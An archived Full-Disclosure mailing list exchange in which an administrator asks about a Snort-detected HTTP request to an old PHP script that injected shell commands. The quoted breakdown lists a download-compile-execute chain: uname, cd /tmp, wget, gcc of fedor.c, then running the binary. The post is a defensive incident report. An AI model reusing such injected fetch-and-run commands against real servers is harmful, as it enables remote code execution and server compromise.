lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  PHC 
Open Source and information security mailing list archives
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
From: dan at (Dan)
Subject: - Anyone seen this before??

I realised my foobar, just after I had posted. (DNS is resolving, I didnt try
www. first)
A tty capable daemon. Interesting.. Surly "they" realise that apache runs as a
separate user on most systems(who runs it root?)
It was the only hit from that netblock so I guess that it was a scan.
And from looking at the google.jpg and the strings.txt i was lead to:
Looks like he makes some scripts/tools, noting a google tool which could
account for the attempt on a dead link.


Dan <> wrote:

> Hi,
> Our Snort picked up an interesting attempt to download, compile and execute.
> Noting also the fact that the sub dir its attempting to access has not been
> there for over 4 months(/logjam/)?
> Has anyone actually seen what this fedor.c is? I have done some google'ing
> it comes up blank.
> Has anyone else noticed this kindof request recently?
> Is it just me or is not resolving anyway?
> Orignal HTTP request:
> GET /logjam/showhits.php?
> Breaking this down we get(twice):
> uname -a
> cd /tmp
> wget
> gcc -o f fedor.c
> ./f
> Regards,
> Daniel.
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter:

Powered by blists - more mailing lists